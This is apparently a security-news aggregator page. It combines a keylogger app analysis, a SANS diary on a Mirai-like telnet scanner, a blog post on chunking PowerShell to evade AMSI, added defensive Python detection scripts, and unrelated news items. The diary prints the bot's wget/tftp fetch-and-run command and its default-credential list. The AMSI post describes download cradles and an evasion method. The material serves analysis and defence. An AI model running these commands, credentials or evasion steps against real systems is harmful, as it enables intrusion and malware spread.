Additionally, this keylogger app can send logged/stolen data to the email ID input by the user during setup, but we found a code snippet that was designed to send this data to another hard-coded email ID as well. The screenshot below shows both code snippets. The first one is the ideal scenario, in which email is sent to the provided email ID, and the second box shows the app's functionality in which a timer task is run to send email to the hard-coded email ID every 60 seconds.

Fig. 8: Sending stolen data to different email IDs

During our analysis, we did not find any calls made to the second code snippet, where email is sent to the hard-coded email ID, and we believe there are two possible explanations. It is possible that the app's author added this functionality while testing and forgot to remove the dead code. This seems unlikely, because the code snippet to send email to the hard-coded email ID is well designed and placed as a timer task to send email every 60 seconds. The second possibility could be related to the app being "under construction."
This app might still be in development and any calls related to this function may be added in future updates.  Conclusion  We believe there are two likely scenarios in which key logging apps, like SPYMIE, may be used. 1. Parents installing spying apps on their children's devices     - Parents can install such apps in order to track their children's online activities 2. Users willingly install such an app to steal someone else's data.     - Any user can install such apps on their Android devices and might offer their phone to others for use. When a victim enters his/her personal details, it will be logged. User can view this information at a later time. It is always advisable to stay away from spying apps, because a typical user can never be sure of what exactly is happening under the hood. Be cautious if using mobile devices other than your own. Never perform critical actions or enter personal information on borrowed or unknown devices. Zscaler users are safe from such type of threats. ZscalerTM Sandbox detected the app accurately as shown in screenshot below:  Fig. 9: Zscaler Cloud Sandbox detection  
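The two traits the analysis above describes, an Accessibility Service that sees every keystroke and an outgoing-call hook used to open the hidden app from the dialer, can be checked statically. The following Python is an added triage example (not Zscaler's code); it reads a decoded AndroidManifest.xml and flags that combination, while leaving a legitimate screen reader alone. Both manifests are constructed; only the package name com.ant.spymie.keylogger comes from the analysis, and the component class names are placeholders.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ACCESSIBILITY_PERMISSION = "android.permission.BIND_ACCESSIBILITY_SERVICE"
ACCESSIBILITY_ACTION = "android.accessibilityservice.AccessibilityService"
OUTGOING_CALL_PERMISSION = "android.permission.PROCESS_OUTGOING_CALLS"
OUTGOING_CALL_ACTION = "android.intent.action.NEW_OUTGOING_CALL"

# Constructed manifest modelled on the behaviour described above. Only the package
# name is from the analysis; the component class names are placeholders.
SPYMIE_LIKE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.ant.spymie.keylogger">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
  <application android:label="Key Logger">
    <service android:name=".PLACEHOLDER_LoggerService"
        android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter><action android:name="android.accessibilityservice.AccessibilityService"/></intent-filter>
    </service>
    <receiver android:name=".PLACEHOLDER_DialerReceiver">
      <intent-filter><action android:name="android.intent.action.NEW_OUTGOING_CALL"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed manifest of a legitimate assistive app: an accessibility service on
# its own is expected here and must not be flagged.
SCREEN_READER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.example.screenreader">
  <application>
    <service android:name=".ReaderService"
        android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter><action android:name="android.accessibilityservice.AccessibilityService"/></intent-filter>
    </service>
  </application>
</manifest>"""


def _android_attr(element, name):
    """Read an attribute from the android: namespace (manifest tags themselves are unprefixed)."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def triage_manifest(manifest_xml):
    """Return the indicators found in a decoded (text) AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    permissions = {_android_attr(p, "name") for p in root.iter("uses-permission")}

    accessibility_services = []
    for service in root.iter("service"):
        actions = {_android_attr(a, "name") for a in service.iter("action")}
        if (_android_attr(service, "permission") == ACCESSIBILITY_PERMISSION
                or ACCESSIBILITY_ACTION in actions):
            accessibility_services.append(_android_attr(service, "name"))

    hooks_outgoing_calls = OUTGOING_CALL_PERMISSION in permissions or any(
        _android_attr(a, "name") == OUTGOING_CALL_ACTION
        for receiver in root.iter("receiver") for a in receiver.iter("action"))

    findings = []
    if accessibility_services:
        findings.append("accessibility service: can observe every UI event and keystroke")
    if hooks_outgoing_calls:
        findings.append("outgoing-call hook: can react to a dialer code such as a secret PIN")

    return {
        "package": root.get("package"),
        "accessibility_services": accessibility_services,
        "hooks_outgoing_calls": hooks_outgoing_calls,
        "findings": findings,
        # An accessibility service alone is normal for assistive apps; combined with
        # a dialer hook it is the hidden-keylogger pattern described above.
        "suspicious": bool(accessibility_services) and hooks_outgoing_calls,
    }
```

The manifest inside an APK is binary XML, so decode it first (for example with apktool) before passing it to triage_manifest.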
Categories: Security Posts



Google’s Waze Can Allow Hackers to Identify and Track Users

Threatpost - 1 hour 7 min ago
The company already patched an API flaw that allowed a security researcher to use the app to find the real identity of drivers using it.

[SANS ISC] Mirai-alike Python Scanner

/dev/random - 1 hour 45 min ago
I published the following diary on isc.sans.edu: “Mirai-alike Python Scanner“: Last week, I found an interesting Python script that behaves like a Mirai bot. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. The script has been uploaded to VT and has a low score of 2/59. Indeed, it does not contain suspicious strings nor API calls. Just a simple but powerful scanner. Here are the commands injected when a device is found with vulnerable credentials…

Ransomware gang donates part of ransom demands to charity organizations

Zero Day | ZDNet RSS Feed - 2 hours 26 min ago
The Darkside ransomware gang has donated $10K it received as part of ransom demands to Children International and The Water Project.

Mirai-alike Python Scanner, (Tue, Oct 20th)

Last week, I found an interesting Python script that behaves like a Mirai bot[1]. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. The script has been uploaded to VT and has a low score of 2/59[2]. Indeed, it does not contain suspicious strings nor API calls. Just a simple but powerful scanner. Here are the commands injected when a device is found with vulnerable credentials:

    rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.10.84/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.148.10.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.148.10.84; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.148.10.84 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh" #command to send

The IP address 45.148.10.84 is offline at the moment but already has a bad reputation and is present in multiple blocklists. Here is the list of credential pairs tested:

    combo = [
        "root:root", "root:", "admin:admin", "telnet:telnet", "support:support", "user:user",
        "admin:", "admin:password", "root:vizxv", "root:admin", "root:xc3511", "root:888888",
        "root:xmhdipc", "root:default", "root:juantech", "root:123456", "root:54321", "root:12345",
        "root:pass", "ubnt:ubnt", "root:klv1234", "root:Zte521", "root:hi3518", "root:jvbzd",
        "root:anko", "root:zlxx.", "root:7ujMko0vizxv", "root:7ujMko0admin", "root:system", "root:ikwb",
        "root:dreambox", "root:user", "root:realtek", "root:00000000", "admin:1111111", "admin:1234",
        "admin:12345", "admin:54321", "admin:123456", "admin:7ujMko0admin", "admin:1234", "admin:pass",
        "admin:meinsm", "admin:admin1234", "root:1111", "admin:smcadmin", "admin:1111", "root:666666",
        "root:password", "root:1234", "root:klv123", "Administrator:admin", "service:service", "supervisor:supervisor",
        "guest:guest", "guest:12345", "guest:12345", "admin1:password", "administrator:1234",
        "666666:666666", "888888:888888", "tech:tech", "mother:fucker"
    ]

The script is pretty well written and is multi-threaded to speed up the scan:

    for l in xrange(threads):
        try:
            t = threading.Thread(target=worker)
            t.start()
        except:
            pass

The script does not implement a random IP address generator, it just uses the zmap[3] scanner:

    zmap -p23 -N 10000 -f saddr -q --verbosity=0

This command will return 10000 IP addresses that expose a telnet port.

The question that arises when you find this kind of script is: "Can we really find so many devices exposing a telnet interface into the wild in 2020?". I did my own test and launched the above zmap command. In a few seconds, 10K IP addresses were returned. Then, I used the nmap scanner with the 'banner' script to grab telnet banners:

    nmap -sC --script=banner -p 23 -Pn -iL open-telnet.txt -oA telnet-banners -v -n

I found a lot of banners that disclose the type of devices (routers, WiFi access points, switches, VoIP gateways, IoT, ...). More interesting, I found some devices still bricked by the BrickerBot:

    # telnet x.x.x.x
    Trying x.x.x.x...
    Connected to x.x.x.x.
    Escape character is '^]'.
    Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop (7/31 2020):
    hxxp://depastedihrn3jtw[.]onion/show.php?md5=20735856837081a18e6f0edf2c1e8d76
    Internet Chemotherapy Part 12 - Third Time is the Charm? (9/6 2020)
    hxxp://depastedihrn3jtw[.]onion/show.php?md5=4c17df6b30ed2704082465d9a1c4ea86
    DeepPaste is temperamental (unreachable 75% of time) so if the links are not loading then try again later.
    Update 10/3: So I have been looking into reconditioning Tenda/Intelbras, Genexis and Zte routers.. Still WIP but seen some positive impact over the last few days/weeks.
    Update 10/6: ..and Totolink..
    10/9: some new tricks for netis, TVT and Tata Consulting.. what next?
    Update 10/17: Getting in the Zhone.. seeing real IoT action in 2020 at last
    (none) login:

I found plenty of notifications and disclaimers warning you that connecting to the device is prohibited, your IP will be logged, etc. Please, don't waste your time implementing such useless banners, just get rid of telnet!

[1] https://www.cyber.nj.gov/threat-center/threat-profiles/botnet-variants/mirai-botnet
[2] https://www.virustotal.com/gui/file/89daf232e0658103883fa05b8968093675b5aa4b6be3fdbd46757144095daf64/details
[3] https://github.com/zmap/zmap

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
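The nmap run in the diary writes, among its -oA outputs, an XML file. For anyone auditing their own address space the same way, the following Python is an added example (not the diary author's code) that parses that XML, lists every host with TCP/23 open and sorts the telnet banners into the categories the diary mentions (bricked by BrickerBot, a login prompt, no banner). The XML sample is constructed with documentation addresses and shortened banners.

```python
import re
import xml.etree.ElementTree as ET

# Constructed nmap XML output modelled on "nmap -sC --script=banner -p 23 -oA ...".
# Addresses are from the 192.0.2.0/24 documentation range; banners are shortened and
# contain no real scan data. The banner script renders CR/LF as \x0D\x0A.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sC --script=banner -p 23 -Pn -n">
  <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="23"><state state="open" reason="syn-ack"/>
      <script id="banner" output="Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop\\x0D\\x0A(none) login: "/>
    </port></ports></host>
  <host><status state="up"/><address addr="192.0.2.11" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="23"><state state="open" reason="syn-ack"/>
      <script id="banner" output="WARNING: Unauthorized access is prohibited. Your IP address will be logged.\\x0D\\x0AUser Name:"/>
    </port></ports></host>
  <host><status state="up"/><address addr="192.0.2.12" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="23"><state state="open" reason="syn-ack"/></port></ports></host>
  <host><status state="up"/><address addr="192.0.2.13" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="23"><state state="closed" reason="reset"/></port></ports></host>
</nmaprun>"""

LOGIN_PROMPT = re.compile(r"(login|user ?name|password)\s*:", re.IGNORECASE)


def classify_banner(banner):
    """Sort a telnet banner into the categories discussed in the diary."""
    if banner is None:
        return "no banner"
    if "BrickerBot" in banner:
        return "bricked (BrickerBot)"
    if LOGIN_PROMPT.search(banner):
        return "login prompt"
    return "other"


def open_telnet_hosts(nmap_xml):
    """Return [(address, banner or None)] for every host whose TCP/23 is open."""
    root = ET.fromstring(nmap_xml)
    results = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.get("protocol") != "tcp" or port.get("portid") != "23":
                continue
            if port.find("state").get("state") != "open":
                continue
            script = port.find("script[@id='banner']")  # absent when no banner was grabbed
            results.append((addr, script.get("output") if script is not None else None))
    return results


def summarize(nmap_xml):
    """Count exposed telnet hosts per banner category."""
    counts = {}
    for _addr, banner in open_telnet_hosts(nmap_xml):
        category = classify_banner(banner)
        counts[category] = counts.get(category, 0) + 1
    return counts


if __name__ == "__main__":
    for addr, banner in open_telnet_hosts(SAMPLE_NMAP_XML):
        print(addr, classify_banner(banner))
    print(summarize(SAMPLE_NMAP_XML))
```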

Hacking Windows 10: Chunking scripts to bypass AMSI

Un informático en el lado del mal - 6 hours 55 min ago
For some time now we have been working with the AMSI (Anti Malware Scan Interface) system in Windows 10 to understand it, get to know it and, where we can, improve how it works by discovering its limits. It is certainly a very interesting protection, one that allows certain malicious instructions in scripting languages such as JavaScript, PowerShell or VBS to be detected before they are executed. It is a way of reaching where the antivirus (AV) cannot, or rather, of finding out what happens inside a process when the AV cannot find out "per se".

Figure 1: Hacking Windows 10: Chunking scripts to bypass AMSI
At Ideas Locas we built the ATTPwn tool, whose new version we told you about yesterday, and into which we put a lot of "love". This threat-emulation tool has made us face the cat-and-mouse game that AMSI, like any other protection, presents. We have already talked about these things on the blog, for example in the article on obfuscation, manual bypass and AMSI.fail.

Figure 2: ATTPwn on GitHub
Working with ATTPwn lately and showing it at several conferences, we noticed how quickly AMSI helps detect ATTPwn, or rather its console, which is the PowerShell startup code. If we study Metasploit and the web_delivery module with its PowerShell option, we can see that in recent versions an AMSI bypass is executed first, if you are on Windows 10, and afterwards the Meterpreter or whatever payload you configured is executed.

Figure 3: Metasploit para Pentesters Gold Edition
This is just one example of today's need to know the possibilities for bypassing AMSI in an Ethical Hacking engagement and, most importantly, to be able to modify any script that bypasses AMSI so that, once detected, we can make it "undetectable" again. That is what this article is about.

When your pentesting-oriented PowerShell code gets detected

When code that did something important for your Ethical Hacking is detected by an AV, thanks to AMSI being implemented in that process, it is a "problem". What can we review? We know that if we obfuscate the code the AV may not flag it as malicious, but do I have more options? Yes. The image shows the ATTPwn console being detected by AMSI.

Figure 4: ATTPwn console detected by AMSI
We can open a PowerShell ISE and check step by step what works and what gets detected. This gives us a first view of the problem; it is a way to isolate and narrow it down. Think about it: if I have a 10-line script, run it as is and it is detected, I have to split the problem. Remember "divide and conquer". My 10-line script can be run in a PowerShell session 2 lines at a time. If I run the first 2 lines and everything goes fine, it means AMSI is not "complaining". We can reduce the problem to:

1. Run the first 2 lines of my 10-line script.
2. If all goes well, run the next 2.
3. If all goes well... continue until reaching the 10 lines of my script.
4. If it has not complained and the functionality ended up running, it means I can operate by "chunking" the function or the script, with no need to obfuscate.

If we take this to the AMSI-bypass level, we ran into the problem that the ATTPwn console was being detected and the user might conclude that the application does not work. That is not true; it is something one has to face and solve. The user can change how that code is executed, obfuscate it, modify it, do whatever it takes to evade the protection.

Figure 5: Pentesting con PowerShell book, 2nd edition
One strategy to solve the problem (which may get detected again in the future) is to chunk rasta-mouse's AMSI bypass, which is in ibombshell and in ATTPwn. The goal is to keep this function from being detected by AMSI and run it. Afterwards we would run ATTPwn in a process without AMSI. How will we do it? We will see that a little further on.

Figure 6: Disabling sample submission in MS Windows Defender
A recommendation when "playing" with all this is to keep the virtual machine without an Internet connection if we do not want signatures to update, and/or to disable sample submission. This can be done easily from Windows Defender, although if the machine has no Internet connection that alone would be enough.

Using a "classic" bypass plus what we have learned

Now let's see how we chunk the script so that we can bypass AMSI and our ATTPwn console is not "caught" as malicious. First of all, we have to consider whether we could do it with a "classic" bypass. It is true that by modifying the line iex(new-object net.webclient).downloadstring('[console URL]') and inserting some string concatenation it can be achieved, if detection is based on a signature of the URL. If it is based on the content of the console function, that will not work.

Figure 7: Part 1 of the script
The mindset behind the strategy is "once something has been executed, it is executed; let's keep reading". This means that, building on the previous section, we can chunk rasta-mouse's AMSI bypass function and invoke it first. Once it has run, we can run the console without problems. Let's get to it.

Figure 8: Part 2 of the script
The first thing to see is that we have 5 *.ps1 files. Each file holds a piece of the AMSI bypass function. You can see the "chunked" code of the third file here.

Figure 9: Part 3 of the script
Now comes a problem we ran into. We wanted to split into too few pieces, that is, in file 4 we wanted to finish the AMSI bypass and run the ATTPwn console. What happened?

Figure 10: Trying to open the console in part 4 of the script
In Figure 10 you can see the code we wrote, but if we try to run the scripts, we will see that the trick will not work here, as shown in the next image.

Figure 11: Failure executing part 4
It was too early, since the instruction that downloads the console was detected as malicious. Perhaps some string concatenation in the URL would fix it, but it is better not to under-split.

Figure 12: Part 4 of the script, correct.
This is how file 4.ps1 and file 5.ps1 end up, each in its own plot, to see whether we can get past AMSI with this chunking.

Figure 13: Part 5 of the script
The idea is to run each one separately, so that AMSI only evaluates the corresponding files. Recalling "once executed, it stays executed": if file 1.ps1 is evaluated as not malicious and we run that piece, let's say the AV has no memory of what you ran previously.

Figure 14: Executing the byp4ss function
In ATTPwn there is a function that returns a function, whichever you ask for, to be executed. This function is "givemefunction". This way you can directly request a function and have it executed before starting the normal flow of an ATTPwn console, which asks for a threat plan to emulate. To recap, we have:

- 5 code "snippets" that together execute the AMSI bypass.
- A file called byp4ss that stores the call iex(new-object net'.'webclient).downloadstring([URL]) to each code "snippet".
- The 5th code fragment is the call to the ATTPwn console.
- The first 4 fragments are executed in turn and their sum is the AMSI bypass.

Note that both the call to the byp4ss function and the calls made inside it, up to achieving the AMSI bypass, use a minimal but necessary obfuscation to make executing the bypass possible. It can be seen in the quoted dot in iex(new-object net'.'webclient).downloadstring([URL]).

Figure 15: Results without and with minimal obfuscation to launch the bypass
It is a technique you can use in various Ethical Hacking or Red Team exercises, since the results are quite good. Another route, as mentioned in this article, is to go for obfuscation. It is another option. Either way, the latest version of ATTPwn, 0.2.1, now lets you create the warrior code this way, to "make sure" of the AMSI bypass in a Windows 10 or Windows Server 2016/2019 environment.
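From the defender's side, the weakness the article exploits (AMSI judging each chunk on its own) is covered by PowerShell script block logging, which records every block with the process that ran it. The following Python is an added detection example (not code from the article or from ATTPwn): it normalises constructed Event ID 4104 ScriptBlockText entries, undoing the quoted dot in net'.'webclient and string concatenation, and reports a run of several small download cradles fetching from one host in one process. The events, the staging host name and the file names are constructed placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed PowerShell script block log entries (Event ID 4104 ScriptBlockText)
# from one host. The staging host and file names are placeholders, not from the article.
SAMPLE_EVENTS = [
    {"pid": 5312, "text": "Invoke-WebRequest -Uri https://updates.example/manifest.json -OutFile m.json"},
    {"pid": 4120, "text": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"pid": 4120, "text": "iex(new-object net'.'webclient).downloadstring('http://staging.example/1.ps1')"},
    {"pid": 4120, "text": "iex(new-object net'.'webclient).downloadstring('http://staging.example/2.ps1')"},
    {"pid": 4120, "text": "iex(new-object net'.'webclient).downloadstring('http://stag'+'ing.example/3.ps1')"},
    {"pid": 4120, "text": "IEX (New-Object Net'.'WebClient).DownloadString(\"http://staging.example/4.ps1\")"},
    {"pid": 4120, "text": "iex(new-object net'.'webclient).downloadstring('http://staging.example/5.ps1')"},
]

# A minimal WebClient download cradle, matched against the normalised text.
CRADLE = re.compile(r"new-object\s+(system\.)?net\.webclient\)?\.download(string|file)\(")
CRADLE_URL = re.compile(r"\.download(?:string|file)\(\s*(https?://[^\s)]+)")


def normalize(script_block):
    """Undo the quote-splitting tricks described above: 'a'+'b' -> ab, net'.'webclient -> net.webclient.
    Dropping every quote is crude but adequate for a detection heuristic."""
    text = re.sub(r"""['"]\s*\+\s*['"]""", "", script_block)  # join adjacent string fragments
    text = text.replace("'", "").replace('"', "")             # drop the remaining quotes
    return re.sub(r"\s+", " ", text).strip().lower()


def is_download_cradle(script_block):
    """True when a single block, once normalised, contains a download cradle."""
    return CRADLE.search(normalize(script_block)) is not None


def find_chunked_staging(events, min_chunks=3):
    """Group cradles by (pid, host). Several small fetches from one host in one process
    is the chunked pattern, even though each block on its own looks like a one-liner."""
    fetches = defaultdict(list)
    for event in events:
        text = normalize(event["text"])
        match = CRADLE_URL.search(text)
        if CRADLE.search(text) and match:
            host = urlparse(match.group(1)).hostname
            fetches[(event["pid"], host)].append(match.group(1))
    return {key: urls for key, urls in fetches.items() if len(urls) >= min_chunks}


if __name__ == "__main__":
    for (pid, host), urls in find_chunked_staging(SAMPLE_EVENTS).items():
        print("pid %d fetched %d chunks from %s" % (pid, len(urls), host))
```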
Regards,

Authors:
Luis E. Álvarez, developer and member of the Ideas Locas CDCO team at Telefónica.
Figure 16: Contact Luis Eduardo Álvarez on MyPublicInbox
Pablo González Pérez (@pablogonzalezpe), author of the books "Metasploit para Pentesters", "Hacking con Metasploit: Advanced Pentesting", "Hacking Windows", "Ethical Hacking", "Got Root", "Pentesting con Powershell", "Pentesting con Kali Silver Edition" and "Empire: Hacking Avanzado en el Red Team", Microsoft MVP in Security and Security Researcher in the "Ideas Locas" team of Telefónica's CDCO unit. For queries you can use the Public Mailbox to contact Pablo González.
Figure 17: Contact Pablo González

ISC Stormcast For Tuesday, October 20th 2020 https://isc.sans.edu/podcastdetail.html?id=7216, (Tue, Oct 20th)


UK says Russia was preparing cyber-attacks against the Tokyo Olympics

Zero Day | ZDNet RSS Feed - 12 hours 28 min ago
Targets included the Games' organizers, logistics services, and sponsors, UK officials said.

What DoH Can Really Do

Webroot - Mon, 2020/10/19 - 22:15
Fine-tuning privacy for any preference

A DNS filtering service that accommodates DNS over HTTPS (DoH) can strengthen an organization’s ability to control network traffic and turn away threats. DoH can offer businesses far greater control and flexibility over their privacy than the old system.

The most visible use of DNS is typically the browser, which is why all the usual suspects are leading the charge in terms of DoH adoption. This movement has considerable steam behind it and has extended beyond just applications, as Microsoft, Apple and Google have all announced their intent to support DoH.

Encrypting DNS requests is an indisputable win for privacy-minded consumers looking to prevent their ISPs from snooping on and monetizing their browsing habits. Businesses, on the other hand, should not easily surrender this visibility, since managing these requests adds value, helping to keep users from navigating to sites known to host malware and other threats. Here are three examples of how.

1. By enhancing DNS logging control

Businesses have varying motivations for tracking online behavior. For persistently troublesome users, those who continuously navigate to risky sites, it’s beneficial to exert some control over their network use or even provide some training on what it takes to stay safe online. It can also be useful in times of problematic productivity dips by helping to tell if users are spending inordinate amounts of time on social media, say.

On the other hand, for CEOs and other strategic business units, tracking online activity can be cause for privacy concerns. Too much detail into the network traffic of a unit tasked with investigating mergers and acquisitions may be unwanted, for example. “If I’m the CEO of a company, I don’t want people paying attention to where I go on the internet,” says Webroot DNS expert Jonathan Barnett. “I don’t want people to know of potential deals I’m investigating before they become public.”

Logging too much user information can also be problematic from a data privacy perspective. Collecting or storing this information in areas with stricter laws, as in the European Union, can unnecessarily burden organizations with red tape. “Essentially it exposes businesses to requirements concerning how they’re going to use that data, who has access to it and how long that data is preserved,” says Barnett. By optionally never logging user information and backing off DNS logging except when a request is deemed a security threat, companies maintain both privacy and security.

2. By allowing devices to echo locally

With DoH, visibility of DNS requests is challenging. The cumulative DNS requests made on a network help to enhance its security, as tools such as SIEMs and firewalls leverage these requests by controlling access as well as correlating the requests with other logs and occurrences on the network.

“Let’s say I’m on my network at the office and I make a DNS request,” explains Barnett. “I may want my DNS request to be seen by the network as well as fielded by my DNS filtering service. The network gets value out of DNS. If I see inappropriate DNS requests I can go and address the user or fix the device.”

Continuing to expose these DNS requests through an echo to the local network provides this, while the actual requests are secured and encrypted by the DNS protection agent using DoH. This option achieves the best of both worlds by adding the security of DoH to the security of the local network.

3. By allowing agents to fail open

DNS is instrumental to the functionality of the internet. So the question is: what do we do when a filtered answer is not available? By failing over to the local network, it’s assured that the internet continues to function. However, there are times when filtering and privacy are more important than connectivity. Being able to choose whether DNS requests can leak out to the local network helps you stay in control by choosing which is the priority.

“Fail open functionality essentially allows admins to make a tradeoff between the protection offered by DNS filtering and the productivity hit that inevitably accompanies a lack of internet access,” says Barnett.

Privacy your way

The encryption of DoH enables options for fine-tuning privacy preferences while preserving the security benefits of DNS filtering. Those that must comply with the needs of privacy-centric users now have control over what is revealed and what is logged, while maintaining the benefits of communicating using DoH.

Rapper Scams $1.2M in COVID-19 Relief, Gloats with ‘EDD’ Video

Threatpost - Mon, 2020/10/19 - 21:22
"Nuke Bizzle" faces 22 years in prison after brazenly bragging about an identity-theft campaign in his music video, "EDD."